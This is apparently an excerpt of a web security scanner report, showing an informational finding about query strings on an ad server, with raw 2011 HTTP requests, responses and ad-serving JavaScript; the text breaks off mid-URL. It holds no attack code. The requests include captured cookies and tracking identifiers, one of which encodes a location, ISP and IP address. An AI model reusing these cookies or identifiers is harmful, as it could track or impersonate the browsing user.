GET /ads/?t=i&f=j&p=4703&pl=a5d83987&rnd=80208794306963680&clkurl=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU9WeGB.XlqKT9FKCMBhTVqhFHQ0NnZW8sdXNhLHQsMTMwNzk2NTU1NDM5MCxjLDM0NjQ1MixwYyw4MDU3MixhYywxNzc5OTgsbyxOMC1TMCxsLDY1MDMzLHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL3JVZmhlaFN1N3otdVItRjZGSzd2UHdBQUFHQm1aZ3BBcEhBOUN0Y2pFMENrY0QwSzF5TVRRTUp5MGd1MGU2aHFfYXlER292QmR5OXYtUFZOQUFBQUFJd3VBQUMxQUFBQWxnSUFBQUlBQUFCTVNBWUEwV01BQUFFQUFBQlZVMFFBVlZORUFOZ0NXZ0F6QzFnQVhBOEJBZ1VDQVFRQUFBQUFiU0tQVWdBQUFBQS4vY25kPSFwQVJ4SlFpOWd3VVF6SkFaR05ISEFTQUEvcmVmZXJyZXI9aHR0cDovL3d3dy50d2Fja2xlLmNvbS9oZWFkbGluZXMvY2xpY2tlbmM9aHR0cDovL2FkY2xpY2suZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJCbU5SYnZqMVRiSFdPLV9Mc1FlbnBienRCTmZxLU5NQnI1NlU3QmpUeGUzVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjF2S0d5S1A4R29JQkYyTmhMWEIxWWkwM05EazBNVFUyTURJM01ERTRNelF5b0FIRDh2M3NBN0lCRDNkM2R5NTBkMkZqYTJ4bExtTnZiYm9CQ1RjeU9IZzVNRjloYzhnQkNkb0JJR2gwZEhBNkx5OTNkM2N1ZEhkaFkydHNaUzVqYjIwdmFHVmhaR3hwYm1Wem1BTGVCOEFDQk1nQ2hkTFBDcWdEQWVnRGlBTG9BN1VJOVFNQUFBREFnQWFHcHFhYnk4VGR4X0VCJm51bT0xJnNpZz1BR2lXcXR6NmpGU0kyQndnbERMbHZtdEU1b3oxS3prUjhnJmNsaWVudD1jYS1wdWItNzQ5NDE1NjAyNzAxODM0MiZhZHVybD0K/clkurl= HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307983550&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307965550231&bpp=3&shv=r20110608&jsv=r20110607&correlator=1307965550274&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1455171707&ga_fc=1&u_tz=-300&u_his=10&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=1&dtd=102&xpc=dku4JBfkuZ&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU0Z06Q290mxcAejSqzMxWLrFym.cAACZkdjLMHkNuvdKBRA1M_PcAAAEv9nh2mw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUHUB8OgnDZdZnbRljKPeKt7neyMcDA3gBY2Bg4GBg2u7HwOoZwsBotYeB4R8nAwMDEDMadFyqu8rANDGUgdVWhIFR6ykDw_t7cLn9pzIZmPbdZWC1m8_AaH.EgZEpBCF35B5ufbte4ta39RcD0_QfDKxuKxgY9VYzMHz6DDdz109OoDvdge5MZmA0B9r1ywwh9.wVA1PGIwaWp78YGNVWMTDcy4fJydxQXQ5kM.HUu1uLF6edu1V1gXoZfL8GMzBwMzDIVzLKMDIwsGxgFAVSDAaMDCwMDOlTwYKKJxi5gYILDzAyAKnlS8FK1nmAKakljPxAwUXnwHLL6hkFgTxo8ILMZwAAbIxUMg--

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUfnX5Xl6I3ndrXm_xOvHgmAVmRFcDA3gBY2Bg4GRgmv6bgdVtKQOj3hYGhk9_GEBiDIwGHZfapjAwbfdjYPUMYWC02sPA8A8oDpOru8rANDGUgdVWhIFR6ykDw_t7cLn9pzIZmPbdZWC1m8_AaH.EgZEpBCF35B5ufbte4ta39RfQnT.A7lwBdOdqoDs_w83c9RPoh.3uQHcmMzCaA.36ZYaQe_aKgSnjEQPL018MjGqrGBju5cPkZG6oLgeymXDq3a3Fi9PO3aq6QL0Mvl.DGRi4GRjkKxllGBkYWDYwigIpBgNGBhYGhvSpYEHFE4zcQMGFBxgZgNTypWAl6zzAlNQSRn6g4KJzYLll9YyCQB406EHmMwAA561b_Q--; Domain=.amgdgt.com; Expires=Wed, 13-Jul-2011 11:45:56 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 2153
Date: Mon, 13 Jun 2011 11:45:56 GMT

_345765_amg_acamp_id=169979;
_345765_amg_pcamp_id=77492;
_345765_amg_location_id=62204;
_345765_amg_creative_id=345765;
_345765_amg_loaded=true;
var _amg_345765_content='<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N6090.278943.EXPEDIAMEDIASOLUTIO/B5435952.7;sz=728x90;click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUYdpcvZVUHMBit47.JlhAJCXBZnlnZW8sdXNhLHQsMTMwNzk2NTU1NjM3MyxjLDM0NTc2NSxwYyw3NzQ5MixhYywxNjk5NzksbyxOMC1TMCxsLDYyMjA0LHBjbGljayxodHRwOi8vYWQuYW1nZGd0LmNvbS9hZHMvdD1jL3M9QUFBQUFRQVU5V2VHQi5YbHFLVDlGS0NNQmhUVnFoRkhRME5uWlc4c2RYTmhMSFFzTVRNd056azJOVFUxTkRNNU1DeGpMRE0wTmpRMU1peHdZeXc0TURVM01peGhZeXd4TnpjNU9UZ3NieXhPTUMxVE1DeHNMRFkxTURNekxIQmpiR2xqYXl4b2RIUndPaTh2YVdJdVlXUnVlSE11WTI5dEwyTnNhV05yTDNKVlptaGxhRk4xTjNvdGRWSXRSalpHU3pkMlVIZEJRVUZIUW0xYVozQkJjRWhCT1VOMFkycEZNRU5yWTBRd1N6RjVUVlJSVFVwNU1HZDFNR1UyYUhGZllYbEVSMjkyUW1SNU9YWXRVRlpPUVVGQlFVRkpkM1ZCUVVNeFFVRkJRV3huU1VGQlFVbEJRVUZDVFZOQldVRXdWMDFCUVVGRlFVRkJRbFpWTUZGQlZsWk9SVUZPWjBOWFowRjZRekZuUVZoQk9FSkJaMVZEUVZGUlFVRkJRVUZpVTB0UVZXZEJRVUZCUVM0dlkyNWtQU0Z3UVZKNFNsRnBPV2QzVlZGNlNrRmFSMDVJU0VGVFFVRXZjbVZtWlhKeVpYSTlhSFIwY0RvdkwzZDNkeTUwZDJGamEyeGxMbU52YlM5b1pXRmtiR2x1WlhNdlkyeHBZMnRsYm1NOWFIUjBjRG92TDJGa1kyeHBZMnN1Wnk1a2IzVmliR1ZqYkdsamF5NXVaWFF2WVdOc2F6OXpZVDFzSm1GcFBVSkNiVTVTWW5acU1WUmlTRmRQTFY5TWMxRmxibkJpZW5SQ1RtWnhMVTVOUW5JMU5sVTNRbXBVZUdVelZVaEJRVkZCVW1kQ1NVRkJORUZXUTBGNExVaEZRa2RFU2pGMlMwZDVTMUE0UjI5SlFrWXlUbWhNV0VJeFdXa3dNMDVFYXpCTlZGVXlUVVJKTTAxRVJUUk5lbEY1YjBGSVJEaDJNM05CTjBsQ1JETmtNMlI1TlRCa01rWnFZVEo0YkV4dFRuWmlZbTlDUTFSamVVOUlaelZOUmpsb1l6aG5Ra05rYjBKSlIyZ3daRWhCTmt4NU9UTmtNMk4xWkVoa2FGa3lkSE5hVXpWcVlqSXdkbUZIVm1oYVIzaHdZbTFXZW0xQlRHVkNPRUZEUWsxblEyaGtURkJEY1dkRVFXVm5SR2xCVEc5Qk4xVkpPVkZOUVVGQlJFRm5RV0ZIY0hGaFluazRWR1I0WDBWQ0ptNTFiVDB4Sm5OcFp6MUJSMmxYY1hSNk5tcEdVMGt5UW5kbmJFUk1iSFp0ZEVVMWIzb3hTM3ByVWpobkptTnNhV1Z1ZEQxallTMXdkV0l0TnpRNU5ERTFOakF5TnpBeE9ETTBNaVpoWkhWeWJEMEsvY2xrdXJsPQo-/clkurl=;ord=971871834?">\n'+
'</SCRIPT><img src="http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=77492&c5=169979&c6=&cv=1.3&cj=1&rn=1727941911" style="display:none" width="0" height="0" alt="" />';
document.writeln(_amg_345765_content);

18.13. http://ad.amgdgt.com/ads/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.amgdgt.com
Path:	/ads/

Issue detail

The page was loaded from a URL containing a query string:

http://ad.amgdgt.com/ads/?t=i&f=j&p=4703&pl=de2c4148&rnd=88095889869146050&clkurl=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUkoW.r4cdEfb2XYjF5Zs53tGozS1nZW8sdXNhLHQsMTMwNzk2NDMyMzMyMixjLDM0MzcxMSxwYyw4MTg2MCxhYywxNzk5MzMsbyxOMC1TMCxsLDY2MTMyLHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL0FBQUFBQUFBQUVBQUFBQUFBQUFBUUFBQUFHQm1aZ3BBcEhBOUN0Y2pFMENrY0QwSzF5TVRRS3ZBLWFuOU5sQnlfYXlER292QmR5LWY4X1ZOQUFBQUFJd3VBQUMxQUFBQWxnSUFBQUlBQUFCSTFRWUEwV01BQUFFQUFBQlZVMFFBVlZORUFOZ0NXZ0F6QzFnQW9nVUJBZ1VDQVFRQUFBQUFEaHhrOGdBQUFBQS4vY25kPSE3UVJ6S0FpNXVBVVF5S29iR05ISEFTQUEvcmVmZXJyZXI9aHR0cDovL3d3dy50d2Fja2xlLmNvbS9oZWFkbGluZXMvY2xpY2tlbmM9aHR0cDovL2FkY2xpY2suZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJhVy0tbl9QMVRaVHNFNG1HbGdmaWxlU3RDTmZxLU5NQnI1NlU3QmpUeGUzVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjF2S0d5S1A4R29JQkYyTmhMWEIxWWkwM05EazBNVFUyTURJM01ERTRNelF5b0FIRDh2M3NBN0lCRDNkM2R5NTBkMkZqYTJ4bExtTnZiYm9CQ1RjeU9IZzVNRjloYzhnQkNkb0JJR2gwZEhBNkx5OTNkM2N1ZEhkaFkydHNaUzVqYjIwdmFHVmhaR3hwYm1Wem1BTFFEOEFDQk1nQ2hkTFBDcWdEQWVnRGlBTG9BN1VJOVFNQUFBREFnQWFLbktIejN0aVA3QkEmbnVtPTEmc2lnPUFHaVdxdHhVaGlxZUlibi0wWXFtOXM0dmRCcnVDSE5QWlEmY2xpZW50PWNhLXB1Yi03NDk0MTU2MDI3MDE4MzQyJmFkdXJsPQo-/clkurl=

The response contains the following links to other domains:

http://ad.doubleclick.net/adi/N553.expedia.com/B5280302.8;sz=728x90;pc=[TPAS_ID];click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU_RmJ3mqStj69rmqrG8obc1aWF.hnZW8sdXNhLHQsMTMwNzk2NDMyNDU4NixjLDM0MzMxNixwYyw3NjUxNyxhYywxNjgyNzcsbyxOMC1TMCxsLDYxNDA2LHBjbGljayxodHRwOi8vYWQuYW1nZGd0LmNvbS9hZHMvdD1jL3M9QUFBQUFRQVVrb1cucjRjZEVmYjJYWWpGNVpzNTN0R296UzFuWlc4c2RYTmhMSFFzTVRNd056azJORE15TXpNeU1peGpMRE0wTXpjeE1TeHdZeXc0TVRnMk1DeGhZeXd4TnprNU16TXNieXhPTUMxVE1DeHNMRFkyTVRNeUxIQmpiR2xqYXl4b2RIUndPaTh2YVdJdVlXUnVlSE11WTI5dEwyTnNhV05yTDBGQlFVRkJRVUZCUVVWQlFVRkJRVUZCUVVGQlVVRkJRVUZIUW0xYVozQkJjRWhCT1VOMFkycEZNRU5yWTBRd1N6RjVUVlJSUzNaQkxXRnVPVTVzUW5sZllYbEVSMjkyUW1SNUxXWTRYMVpPUVVGQlFVRkpkM1ZCUVVNeFFVRkJRV3huU1VGQlFVbEJRVUZDU1RGUldVRXdWMDFCUVVGRlFVRkJRbFpWTUZGQlZsWk9SVUZPWjBOWFowRjZRekZuUVc5blZVSkJaMVZEUVZGUlFVRkJRVUZFYUhock9HZEJRVUZCUVM0dlkyNWtQU0UzVVZKNlMwRnBOWFZCVlZGNVMyOWlSMDVJU0VGVFFVRXZjbVZtWlhKeVpYSTlhSFIwY0RvdkwzZDNkeTUwZDJGamEyeGxMbU52YlM5b1pXRmtiR2x1WlhNdlkyeHBZMnRsYm1NOWFIUjBjRG92TDJGa1kyeHBZMnN1Wnk1a2IzVmliR1ZqYkdsamF5NXVaWFF2WVdOc2F6OXpZVDFzSm1GcFBVSmhWeTB0Ymw5UU1WUmFWSE5GTkcxSGJHZG1hV3hsVTNSRFRtWnhMVTVOUW5JMU5sVTNRbXBVZUdVelZVaEJRVkZCVW1kQ1NVRkJORUZXUTBGNExVaEZRa2RFU2pGMlMwZDVTMUE0UjI5SlFrWXlUbWhNV0VJeFdXa3dNMDVFYXpCTlZGVXlUVVJKTTAxRVJUUk5lbEY1YjBGSVJEaDJNM05CTjBsQ1JETmtNMlI1TlRCa01rWnFZVEo0YkV4dFRuWmlZbTlDUTFSamVVOUlaelZOUmpsb1l6aG5Ra05rYjBKSlIyZ3daRWhCTmt4NU9UTmtNMk4xWkVoa2FGa3lkSE5hVXpWcVlqSXdkbUZIVm1oYVIzaHdZbTFXZW0xQlRGRkVPRUZEUWsxblEyaGtURkJEY1dkRVFXVm5SR2xCVEc5Qk4xVkpPVkZOUVVGQlJFRm5RV0ZMYmt0SWVqTjBhVkEzUWtFbWJuVnRQVEVtYzJsblBVRkhhVmR4ZEhoVmFHbHhaVWxpYmkwd1dYRnRPWE0wZG1SQ2NuVkRTRTVRV2xFbVkyeHBaVzUwUFdOaExYQjFZaTAzTkRrME1UVTJNREkzTURFNE16UXlKbUZrZFhKc1BRby0vY2xrdXJsPQo-/clkurl=;ord=1762201346?
http://ad.doubleclick.net/adj/N553.expedia.com/B5280302.8;abr=!ie;sz=728x90;pc=[TPAS_ID];click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU_RmJ3mqStj69rmqrG8obc1aWF.hnZW8sdXNhLHQsMTMwNzk2NDMyNDU4NixjLDM0MzMxNixwYyw3NjUxNyxhYywxNjgyNzcsbyxOMC1TMCxsLDYxNDA2LHBjbGljayxodHRwOi8vYWQuYW1nZGd0LmNvbS9hZHMvdD1jL3M9QUFBQUFRQVVrb1cucjRjZEVmYjJYWWpGNVpzNTN0R296UzFuWlc4c2RYTmhMSFFzTVRNd056azJORE15TXpNeU1peGpMRE0wTXpjeE1TeHdZeXc0TVRnMk1DeGhZeXd4TnprNU16TXNieXhPTUMxVE1DeHNMRFkyTVRNeUxIQmpiR2xqYXl4b2RIUndPaTh2YVdJdVlXUnVlSE11WTI5dEwyTnNhV05yTDBGQlFVRkJRVUZCUVVWQlFVRkJRVUZCUVVGQlVVRkJRVUZIUW0xYVozQkJjRWhCT1VOMFkycEZNRU5yWTBRd1N6RjVUVlJSUzNaQkxXRnVPVTVzUW5sZllYbEVSMjkyUW1SNUxXWTRYMVpPUVVGQlFVRkpkM1ZCUVVNeFFVRkJRV3huU1VGQlFVbEJRVUZDU1RGUldVRXdWMDFCUVVGRlFVRkJRbFpWTUZGQlZsWk9SVUZPWjBOWFowRjZRekZuUVc5blZVSkJaMVZEUVZGUlFVRkJRVUZFYUhock9HZEJRVUZCUVM0dlkyNWtQU0UzVVZKNlMwRnBOWFZCVlZGNVMyOWlSMDVJU0VGVFFVRXZjbVZtWlhKeVpYSTlhSFIwY0RvdkwzZDNkeTUwZDJGamEyeGxMbU52YlM5b1pXRmtiR2x1WlhNdlkyeHBZMnRsYm1NOWFIUjBjRG92TDJGa1kyeHBZMnN1Wnk1a2IzVmliR1ZqYkdsamF5NXVaWFF2WVdOc2F6OXpZVDFzSm1GcFBVSmhWeTB0Ymw5UU1WUmFWSE5GTkcxSGJHZG1hV3hsVTNSRFRtWnhMVTVOUW5JMU5sVTNRbXBVZUdVelZVaEJRVkZCVW1kQ1NVRkJORUZXUTBGNExVaEZRa2RFU2pGMlMwZDVTMUE0UjI5SlFrWXlUbWhNV0VJeFdXa3dNMDVFYXpCTlZGVXlUVVJKTTAxRVJUUk5lbEY1YjBGSVJEaDJNM05CTjBsQ1JETmtNMlI1TlRCa01rWnFZVEo0YkV4dFRuWmlZbTlDUTFSamVVOUlaelZOUmpsb1l6aG5Ra05rYjBKSlIyZ3daRWhCTmt4NU9UTmtNMk4xWkVoa2FGa3lkSE5hVXpWcVlqSXdkbUZIVm1oYVIzaHdZbTFXZW0xQlRGRkVPRUZEUWsxblEyaGtURkJEY1dkRVFXVm5SR2xCVEc5Qk4xVkpPVkZOUVVGQlJFRm5RV0ZMYmt0SWVqTjBhVkEzUWtFbWJuVnRQVEVtYzJsblBVRkhhVmR4ZEhoVmFHbHhaVWxpYmkwd1dYRnRPWE0wZG1SQ2NuVkRTRTVRV2xFbVkyeHBaVzUwUFdOaExYQjFZaTAzTkRrME1UVTJNREkzTURFNE16UXlKbUZrZFhKc1BRby0vY2xrdXJsPQo-/clkurl=;ord=1762201346?
http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=76517&c5=168277&c6=&cv=1.3&cj=1&rn=1494814222

Request

GET /ads/?t=i&f=j&p=4703&pl=de2c4148&rnd=88095889869146050&clkurl=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUkoW.r4cdEfb2XYjF5Zs53tGozS1nZW8sdXNhLHQsMTMwNzk2NDMyMzMyMixjLDM0MzcxMSxwYyw4MTg2MCxhYywxNzk5MzMsbyxOMC1TMCxsLDY2MTMyLHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL0FBQUFBQUFBQUVBQUFBQUFBQUFBUUFBQUFHQm1aZ3BBcEhBOUN0Y2pFMENrY0QwSzF5TVRRS3ZBLWFuOU5sQnlfYXlER292QmR5LWY4X1ZOQUFBQUFJd3VBQUMxQUFBQWxnSUFBQUlBQUFCSTFRWUEwV01BQUFFQUFBQlZVMFFBVlZORUFOZ0NXZ0F6QzFnQW9nVUJBZ1VDQVFRQUFBQUFEaHhrOGdBQUFBQS4vY25kPSE3UVJ6S0FpNXVBVVF5S29iR05ISEFTQUEvcmVmZXJyZXI9aHR0cDovL3d3dy50d2Fja2xlLmNvbS9oZWFkbGluZXMvY2xpY2tlbmM9aHR0cDovL2FkY2xpY2suZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJhVy0tbl9QMVRaVHNFNG1HbGdmaWxlU3RDTmZxLU5NQnI1NlU3QmpUeGUzVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjF2S0d5S1A4R29JQkYyTmhMWEIxWWkwM05EazBNVFUyTURJM01ERTRNelF5b0FIRDh2M3NBN0lCRDNkM2R5NTBkMkZqYTJ4bExtTnZiYm9CQ1RjeU9IZzVNRjloYzhnQkNkb0JJR2gwZEhBNkx5OTNkM2N1ZEhkaFkydHNaUzVqYjIwdmFHVmhaR3hwYm1Wem1BTFFEOEFDQk1nQ2hkTFBDcWdEQWVnRGlBTG9BN1VJOVFNQUFBREFnQWFLbktIejN0aVA3QkEmbnVtPTEmc2lnPUFHaVdxdHhVaGlxZUlibi0wWXFtOXM0dmRCcnVDSE5QWlEmY2xpZW50PWNhLXB1Yi03NDk0MTU2MDI3MDE4MzQyJmFkdXJsPQo-/clkurl= HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307982318&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307964318507&bpp=5&shv=r20110608&jsv=r20110607&correlator=1307964318556&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1852423368&ga_fc=1&u_tz=-300&u_his=6&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&eid=33895298%2C33895143&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=1&dtd=193&xpc=vvOBQeNuNQ&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU0Z06Q290mxcAejSqzMxWLrFym.cAACZkdjLMHkNuvdKBRA1M_PcAAAEv9nh2mw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUoa8luhwfhKEzI0u6DHvKJtigrxMDA3gBY2BgYGFg2neXgdVuPgOj_REGRqYQBgYGTgYGRoOO_Vt_MTBN_8HA6raCgVFvNQPDp89wuV0_ORmYtrszsHomMzCaA_X8MkPIPXvFwJTxiIHl6S8GRrVVDAz38mFyMjdUlwPZTDj17tbixWnnblVdoF4G36_BDAzcDAzylYwyjED3b2AUBVIMBoxAYxnSp4IFFU8wcgMFFx5gZABSy5eClazzAFNSSxj5gYKLzoHlltUzCgJ5UO.CzGcAAEOOONw-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUN1PteUmIcdkK93wzi.ombmrBQnsDA3gBY2BgYGVgmhjKwGorwsCo9ZSB4f09BgYGTgYGRoOO_bteMjDtu8vAajefgdH.CAMjUwhCbusvBqbpPxhY3VYwMOqtZmD49Bkut.snJwPTdncGVs9kBkZzoJ5fZgi5Z68YmDIeMbA8_cXAqLaKgeFePkxO5obqciCbCafe3Vq8OO3craoL1Mvg.zWYgYGbgUG.klGGkYGBZQOjKJBiMGAEGsuQPhUsqHiCkRsouPAAIwOQWr4UrGSdB5iSWsLIDxRcdA4st6yeURDIAwfFK5DxDAwAUM5AEQ--; Domain=.amgdgt.com; Expires=Wed, 13-Jul-2011 11:25:24 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 4031
Date: Mon, 13 Jun 2011 11:25:23 GMT

_343316_amg_acamp_id=168277;
_343316_amg_pcamp_id=76517;
_343316_amg_location_id=61406;
_343316_amg_creative_id=343316;
_343316_amg_loaded=true;
var _amg_343316_content='<IFRAME SRC="http://ad.doubleclick.net/adi/N553.expedia.com/B5280302.8;sz=728x90;pc=[TPAS_ID];click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU_RmJ3mqStj69rmqrG8obc1aWF.hnZW8sdXNhLHQsMTMwNzk2NDMyNDU4NixjLDM0MzMxNixwYyw3NjUxNyxhYywxNjgyNzcsbyxOMC1TMCxsLDYxNDA2LHBjbGljayxodHRwOi8vYWQuYW1nZGd0LmNvbS9hZHMvdD1jL3M9QUFBQUFRQVVrb1cucjRjZEVmYjJYWWpGNVpzNTN0R296UzFuWlc4c2RYTmhMSFFzTVRNd056azJORE15TXpNeU1peGpMRE0wTXpjeE1TeHdZeXc0TVRnMk1DeGhZeXd4TnprNU16TXNieXhPTUMxVE1DeHNMRFkyTVRNeUxIQmpiR2xqYXl4b2RIUndPaTh2YVdJdVlXUnVlSE11WTI5dEwyTnNhV05yTDBGQlFVRkJRVUZCUVVWQlFVRkJRVUZCUVVGQlVVRkJRVUZIUW0xYVozQkJjRWhCT1VOMFkycEZNRU5yWTBRd1N6RjVUVlJSUzNaQkxXRnVPVTVzUW5sZllYbEVSMjkyUW1SNUxXWTRYMVpPUVVGQlFVRkpkM1ZCUVVNeFFVRkJRV3huU1VGQlFVbEJRVUZDU1RGUldVRXdWMDFCUVVGRlFVRkJRbFpWTUZGQlZsWk9SVUZPWjBOWFowRjZRekZuUVc5blZVSkJaMVZEUVZGUlFVRkJRVUZFYUhock9HZEJRVUZCUVM0dlkyNWtQU0UzVVZKNlMwRnBOWFZCVlZGNVMyOWlSMDVJU0VGVFFVRXZjbVZtWlhKeVpYSTlhSFIwY0RvdkwzZDNkeTUwZDJGamEyeGxMbU52YlM5b1pXRmtiR2x1WlhNdlkyeHBZMnRsYm1NOWFIUjBjRG92TDJGa1kyeHBZMnN1Wnk1a2IzVmliR1ZqYkdsamF5NXVaWFF2WVdOc2F6OXpZVDFzSm1GcFBVSmhWeTB0Ymw5UU1WUmFWSE5GTkcxSGJHZG1hV3hsVTNSRFRtWnhMVTVOUW5JMU5sVTNRbXBVZUdVelZVaEJRVkZCVW1kQ1NVRkJORUZXUTBGNExVaEZRa2RFU2pGMlMwZDVTMUE0UjI5SlFrWXlUbWhNV0VJeFdXa3dNMDVFYXpCTlZGVXlUVVJKTTAxRVJUUk5lbEY1YjBGSVJEaDJNM05CTjBsQ1JETmtNMlI1TlRCa01rWnFZVEo0YkV4dFRuWmlZbTlDUTFSamVVOUlaelZOUmpsb1l6aG5Ra05rYjBKSlIyZ3daRWhCTmt4NU9UTmtNMk4xWkVoa2FGa3lkSE5hVXpWcVlqSXdkbUZIVm1oYVIzaHdZbTFXZW0xQlRGRkVPRUZEUWsxblEyaGtURkJEY1dkRVFXVm5SR2xCVEc5Qk4xVkpPVkZOUVVGQlJFRm5RV0ZMYmt0SWVqTjBhVkEzUWtFbWJuVnRQVEVtYzJsblBVRkhhVmR4ZEhoVmFHbHhaVWxpYmkwd1dYRnRPWE0wZG1SQ2NuVkRTRTVRV2xFbVkyeHBaVzUwUFdOaExYQjFZaTAzTkRrME1UVTJNREkzTURFNE16UXlKbUZrZFhKc1BRby0vY2xrdXJsPQo-/clkurl=;ord=1762201346?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n'+
'<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N553.expedia.com/B5280302.8;abr=!ie;sz=728x90;pc=[TPAS_ID];click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU_RmJ3mqStj69rmqrG8obc1aWF.hnZW8sdXNhLHQsMTMwNzk2NDMyNDU4NixjLDM0MzMxNixwYyw3NjUxNyxhYywxNjgyNzcsbyxOMC1TMCxsLDYxNDA2LHBjbGljayxodHRwOi8vYWQuYW1nZGd0LmNvbS9hZHMvdD1jL3M9QUFBQUFRQVVrb1cucjRjZEVmYjJYWWpGNVpzNTN0R296UzFuWlc4c2RYTmhMSFFzTVRNd056azJORE15TXpNeU1peGpMRE0wTXpjeE1TeHdZeXc0TVRnMk1DeGhZeXd4TnprNU16TXNieXhPTUMxVE1DeHNMRFkyTVRNeUxIQmpiR2xqYXl4b2RIUndPaTh2YVdJdVlXUnVlSE11WTI5dEwyTnNhV05yTDBGQlFVRkJRVUZCUVVWQlFVRkJRVUZCUVVGQlVVRkJRVUZIUW0xYVozQkJjRWhCT1VOMFkycEZNRU5yWTBRd1N6RjVUVlJSUzNaQkxXRnVPVTVzUW5sZllYbEVSMjkyUW1SNUxXWTRYMVpPUVVGQlFVRkpkM1ZCUVVNeFFVRkJRV3huU1VGQlFVbEJRVUZDU1RGUldVRXdWMDFCUVVGRlFVRkJRbFpWTUZGQlZsWk9SVUZPWjBOWFowRjZRekZuUVc5blZVSkJaMVZEUVZGUlFVRkJRVUZFYUhock9HZEJRVUZCUVM0dlkyNWtQU0UzVVZKNlMwRnBOWFZCVlZGNVMyOWlSMDVJU0VGVFFVRXZjbVZtWlhKeVpYSTlhSFIwY0RvdkwzZDNkeTUwZDJGamEyeGxMbU52YlM5b1pXRmtiR2x1WlhNdlkyeHBZMnRsYm1NOWFIUjBjRG92TDJGa1kyeHBZMnN1Wnk1a2IzVmliR1ZqYkdsamF5NXVaWFF2WVdOc2F6OXpZVDFzSm1GcFBVSmhWeTB0Ymw5UU1WUmFWSE5GTkcxSGJHZG1hV3hsVTNSRFRtWnhMVTVOUW5JMU5sVTNRbXBVZUdVelZVaEJRVkZCVW1kQ1NVRkJORUZXUTBGNExVaEZRa2RFU2pGMlMwZDVTMUE0UjI5SlFrWXlUbWhNV0VJeFdXa3dNMDVFYXpCTlZGVXl